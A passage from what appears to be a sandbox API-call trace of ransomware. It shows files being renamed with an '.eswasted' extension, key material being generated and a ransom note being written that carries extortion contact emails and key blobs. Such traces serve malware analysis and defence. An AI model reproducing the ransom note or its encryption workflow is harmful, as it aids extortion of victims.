dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0082.414] WriteFile (in: hFile=0x108, lpBuffer=0x1312110*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312110*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.415] SetEndOfFile (hFile=0x108) returned 1 [0082.415] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0082.415] lstrcpyW (in: lpString1=0x70c242, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted")) returned 1 [0082.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0082.416] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0085.117] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0085.118] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0085.118] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0085.118] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0085.119] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0085.119] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0085.128] SetEndOfFile (hFile=0x108) returned 1 [0085.130] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0085.130] CloseHandle (hObject=0x108) returned 1 [0085.508] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0085.508] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0085.509] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0085.509] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0085.509] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0085.509] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x292) returned 0x71ec18 [0085.509] lstrcpyW (in: lpString1=0x71eca0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0085.509] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0085.509] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0085.510] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312050 | out: pbBuffer=0x1312050) returned 1 [0085.510] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0085.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.eswasted_info" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0085.512] WriteFile (in: hFile=0x108, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0085.518] SetEndOfFile (hFile=0x108) returned 1 [0085.518] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.518] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0085.519] lstrcpyW (in: lpString1=0x71eca0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0085.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.eswasted")) returned 1 [0085.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0085.520] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0088.683] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0088.693] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0088.693] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0088.694] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0088.694] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0088.694] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0088.707] SetEndOfFile (hFile=0x108) returned 1 [0088.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0088.713] CloseHandle (hObject=0x108) returned 1 [0088.715] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0088.715] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0088.716] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0088.716] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0088.716] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0088.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x274) returned 0x71ec18 [0088.716] lstrcpyW (in: lpString1=0x71ec82, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0088.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0088.716] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0088.717] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312050 | out: pbBuffer=0x1312050) returned 1 [0088.717] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0088.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.eswasted_info" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0088.717] WriteFile (in: hFile=0x108, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0088.718] SetEndOfFile (hFile=0x108) returned 1 [0088.718] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.718] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0088.718] lstrcpyW (in: lpString1=0x71ec82, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0088.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.eswasted")) returned 1 [0088.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0088.719] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0096.968] UnmapViewOfFile (lpBaseAddress=0x2210000) returned 1 [0097.039] CloseHandle (hObject=0x10c) returned 1 [0097.088] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0097.089] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0097.093] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0097.093] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0097.093] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0097.094] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0097.094] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0097.103] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x73a000 [0097.103] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0097.103] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0097.150] _snwprintf (in: _Dest=0x1312050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]k1GIzMZDhA1V3eV316M/Kejmrh3JON7NAun4MQ4nLYwYShBND20B5h/vUgKYHeF6\r\nB7vzg2YeUG3J8vsZQQXi0UnRu/xSxPnVcPxz+OFdkNPBvwt1HchKGZrsOmQ/RzeV\r\nf0mKaEquaHEpz7dqyltQes+Q14JrRG2cTT2/bLTplj/3kKZerlmR9oAvQYho5kY+\r\nu+liX+ScrpVZnCGH79xkUpLssvc8NStFuSmubsuSej0FqiQPEALZMnTPPqU8d4Lz\r\nhp6cdJHA4UWi8PFVTde1WhJXvtNxslo1BOIxE9FQtolqEnEFaGDqZFNo8hqZp/tW\r\nO8j1OxkaO7sn/3YUJBb049lJGZzX3lqF2t9t/0pPJQv4g5PQyNDbznzkMPaaOg0m\r\ni6vxBjNBjIT4C7XKIkEJOkQhBxGkQnb6haaHxEfebwaRyociEHKP7klwdA4xZsAJ\r\n0zTxvkuhMEoXAkJUl9P9RlvUgxO6kCfBi2nzlA0iee/rFqnx4SuC1gC8U6SoYE4f\r\n4XhNSjQYT7afC+CKfiGA9cPPkTXfgNxDUulvOAO6EERWctzV5dMuGNgh3SuwUc15\r\n1Q/dCxG3Gl5Lb8r2gVL6NR6q3EPkIAQjzJ5w40VMxAR8+JnbmMYiGbaZrCWHVRLE\r\nNR/TXNw+fAewTU/u7Qvs1s0NlBdhuu15RyfT71US2pk=[end_key]\r\nKEEP IT\r\n") returned 990 [0097.151] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a000 | out: hHeap=0x6d0000) returned 1 [0097.151] WriteFile (in: hFile=0x108, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0097.151] SetEndOfFile (hFile=0x108) returned 1 [0097.154] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0097.154] CloseHandle (hObject=0x108) returned 1 [0097.156] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0097.156] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7279a0 | out: hHeap=0x6d0000) returned 1 [0097.157] _aulldvrm () returned 0x0 [0097.157] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0097.158] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0097.158] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0097.158] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0097.158] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x286) returned 0x71ec18 [0097.158] lstrcpyW (in: lpString1=0x71ec94, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0097.158] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0097.158] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0097.159] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1312050 | out: pbBuffer=0x1312050) returned 1 [0097.159] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0097.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0097.161] WriteFile (in: hFile=0x108, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0097.163] SetEndOfFile (hFile=0x108) returned 1 [0097.163] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.163] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0097.163] lstrcpyW (in: lpString1=0x71ec94, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0097.163] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.eswasted")) returned 1 [0097.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0097.308] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0097.308] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0xd6b22 [0097.308] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd6b22) returned 0x1610000 [0097.309] CloseHandle (hObject=0x11c) returned 1 [0097.435] UnmapViewOfFile (lpBaseAddress=0x1610000) returned 1 [0097.439] CloseHandle (hObject=0x10c) returned 1 [0097.439] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0097.439] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f0e0) returned 1 [0097.441] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0097.441] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.441] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f0e0) returned 1 [0097.442] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0097.442] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x73a000 [0097.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0097.451] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0097.451] _snwprintf (in: _Dest=0x1312050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kEAhAgjdZJAYCTiTDfDm5CkAEeXCv1kiRbuMwwSPaMBY4Un4dheYI5bUaO90Klam\r\nxI6yDTmrnNSYAUoSGCCZNoZLmFm29oeDgdpSGmiTaYNRcv0XiaS+ZxabuUZnaFdj\r\nMddIkK7z97X/g0zhbimNlYwFZ/yEP2QBWv8B2Hq7oPsJNosV9QhZv0R5CYLDf8CU\r\nLhjIAGqTbfysOYb+o2wCFm1edzZyrofx5apj5XDU45027JxIQJ7gKlal4zkOLPP9\r\nfWsaq9BO7ZKZ0CEmpuMmJ6/TzdYg4KQhCJWfcUL+Af9JD28xA1ATqoXLFHnXoqex\r\nap16aL7N6O9gRXTC63HqAO7k/0CNX4leMR+1CqqMfuzkUTGFocyMn7DmL7I1gcWN\r\nJDR42/SBu6yP+NhSHvDRzWv/DbG9VbvHR9jkMSF5N9uxac917AdXV9nv4ZsbSH1T\r\nRwV9bqkl1nCm/2AOYCydL+gqZuZCljyP1OJLl2gig7BcyBD9ZFX4t3M7xu8qEBUB\r\nV2/U8m44FXqEIbmqOS6gdCr+Fc05IXf+/jU9j24s2fZ/CBB8omhskX+LvIMxxN3c\r\nfChumQfPFwWNCO8bdPZ9k2oqkFhNSpOvFB0PJbTUfD2fxBYpCsAZx+dRPVwUAP8l\r\nfLY8t74XAEY1GQE9AutgEa/EMSiLhPkStQPbOq9ApRN=[end_key]\r\nKEEP IT\r\n") returned 990 [0097.451] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a000 | out: hHeap=0x6d0000) returned 1 [0097.451] WriteFile (in: hFile=0x108, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0097.451] SetEndOfFile (hFile=0x108) returned 1 [0097.453] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0097.453] CloseHandle (hObject=0x108) returned 1 [0097.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0097.455] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71dc38 | out: hHeap=0x6d0000) returned 1 [0097.456] _aulldvrm () returned 0x0 [0097.456] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f0e0) returned 1 [0097.456] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0097.456] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.457] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0097.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x280) returned 0x71ec18 [0097.457] lstrcpyW (in: lpString1=0x71ec8e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0097.457] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0097.457] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f0e0) returned 1 [0097.457] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1312050 | out: pbBuffer=0x1312050) returned 1 [0097.457] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0097.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0097.458] WriteFile (in: hFile=0x108, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0097.459] SetEndOfFile (hFile=0x108) returned 1 [0097.460] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.460] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0097.460] lstrcpyW (in: lpString1=0x71ec8e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0097.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.eswasted")) returned 1 [0097.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0097.528] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0097.528] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x91554 [0097.528] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91554) returned 0x1610000 [0097.529] CloseHandle (hObject=0x124) returned 1 [0097.570] UnmapViewOfFile (lpBaseAddress=0x1610000) returned 1 [0097.575] CloseHandle (hObject=0x11c) returned 1 [0097.575] 